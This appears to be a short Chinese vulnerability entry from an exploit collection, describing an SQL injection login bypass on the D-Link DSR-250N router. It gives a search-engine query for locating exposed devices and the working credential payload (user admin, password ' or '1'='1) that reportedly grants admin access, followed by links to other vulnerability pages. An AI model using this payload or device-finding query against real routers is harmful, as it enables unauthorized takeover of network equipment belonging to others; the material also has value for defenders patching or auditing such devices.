# D-Link DSR-250N SQL注入漏洞

# 漏洞描述

D-Link DSR-250N 存在万能密码漏洞，攻击者通过漏洞可以获取后台权限

# 漏洞影响

D-Link DSR-250N

# 网络测绘

app="D_Link-DSR-250N"

# 漏洞复现

登录页面如下

user: admin
pass: ' or '1'='1

1
2

成功登录后台

D-Link DAR-8000 importhtml.php 远程命令执行漏洞惠尔顿 e地通 config.xml 信息泄漏漏洞